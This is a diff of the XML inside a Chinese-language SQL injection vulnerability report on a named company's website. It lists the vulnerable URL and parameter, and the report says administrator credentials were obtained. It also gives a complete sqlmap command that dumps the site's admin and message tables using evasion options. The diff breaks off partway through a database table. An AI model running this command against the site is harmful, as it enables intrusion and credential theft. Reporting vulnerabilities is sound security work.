<commit_message>
vault backup: 2026-04-09 10:47:45
</commit_message>
<xml_diff>
--- a/计算机技术学习/漏洞报告/大连（林）精密铸造有限公司/大连（林）精密铸造有限公司_SQL注入漏洞报告.docx
+++ b/计算机技术学习/漏洞报告/大连（林）精密铸造有限公司/大连（林）精密铸造有限公司_SQL注入漏洞报告.docx
@@ -28,6 +28,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="8"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblInd w:w="0" w:type="dxa"/>
@@ -39,7 +40,7 @@
           <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
         </w:tblBorders>
-        <w:shd w:val="clear"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
         <w:tblLayout w:type="autofit"/>
         <w:tblCellMar>
           <w:top w:w="15" w:type="dxa"/>
@@ -62,7 +63,7 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -77,7 +78,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -109,7 +110,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -149,7 +150,7 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -163,7 +164,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -190,7 +191,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -210,6 +211,699 @@
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
               <w:t>SQL 注入（SQL Injection）</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          </w:tblBorders>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          <w:tblCellMar>
+            <w:top w:w="15" w:type="dxa"/>
+            <w:left w:w="15" w:type="dxa"/>
+            <w:bottom w:w="15" w:type="dxa"/>
+            <w:right w:w="15" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="10"/>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>漏洞等级</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>🔴 高危</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          </w:tblBorders>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          <w:tblCellMar>
+            <w:top w:w="15" w:type="dxa"/>
+            <w:left w:w="15" w:type="dxa"/>
+            <w:bottom w:w="15" w:type="dxa"/>
+            <w:right w:w="15" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="10"/>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>影响站点</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> HYPERLINK "http://www.dlhayashi.com" \t "_blank" </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="11"/>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>http://www.dlhayashi.com</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          </w:tblBorders>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          <w:tblCellMar>
+            <w:top w:w="15" w:type="dxa"/>
+            <w:left w:w="15" w:type="dxa"/>
+            <w:bottom w:w="15" w:type="dxa"/>
+            <w:right w:w="15" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="10"/>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>影响范围</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>数据库信息泄露、管理员账号密码获取</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          </w:tblBorders>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          <w:tblCellMar>
+            <w:top w:w="15" w:type="dxa"/>
+            <w:left w:w="15" w:type="dxa"/>
+            <w:bottom w:w="15" w:type="dxa"/>
+            <w:right w:w="15" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="10"/>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>漏洞状态</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>✅ 已确认</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          </w:tblBorders>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          <w:tblCellMar>
+            <w:top w:w="15" w:type="dxa"/>
+            <w:left w:w="15" w:type="dxa"/>
+            <w:bottom w:w="15" w:type="dxa"/>
+            <w:right w:w="15" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="10"/>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>测试时间</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>2026-03-09 ~ 2026-03-10</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>2. 技术细节</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>2.1 漏洞位置</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="10"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="12"/>
+        </w:rPr>
+        <w:t>http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="10"/>
+        </w:rPr>
+        <w:t>注入点</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="12"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 参数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="10"/>
+        </w:rPr>
+        <w:t>漏洞原因</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：应用程序未对用户输入进行参数化处理，直接将用户输入拼接到 SQL 语句中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Sqlmap命令</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>sqlmap -u "http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=1" -D qdm177261645_db -T jm_admin,jm_liuyan --dump --random-agent --delay=1 --time-sec=2 --tamper=space2comment --threads=1 --batch</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>2.2 数据库信息</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="8"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+        </w:tblBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+        <w:tblLayout w:type="autofit"/>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1280"/>
+        <w:gridCol w:w="3555"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="15" w:type="dxa"/>
+            <w:left w:w="15" w:type="dxa"/>
+            <w:bottom w:w="15" w:type="dxa"/>
+            <w:right w:w="15" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:trPr>
+          <w:tblHeader/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:b/>
+                <w:bCs/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>项目</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+                <w:b/>
+                <w:bCs/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>内容</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -237,7 +931,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -257,14 +951,14 @@
                 <w:szCs w:val="24"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>漏洞等级</w:t>
+              <w:t>数据库名称</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -283,7 +977,7 @@
                 <w:szCs w:val="24"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>🔴 高危</w:t>
+              <w:t>qdm177261645_db</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -311,7 +1005,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -331,14 +1025,14 @@
                 <w:szCs w:val="24"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>影响站点</w:t>
+              <w:t>表名</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -357,46 +1051,7 @@
                 <w:szCs w:val="24"/>
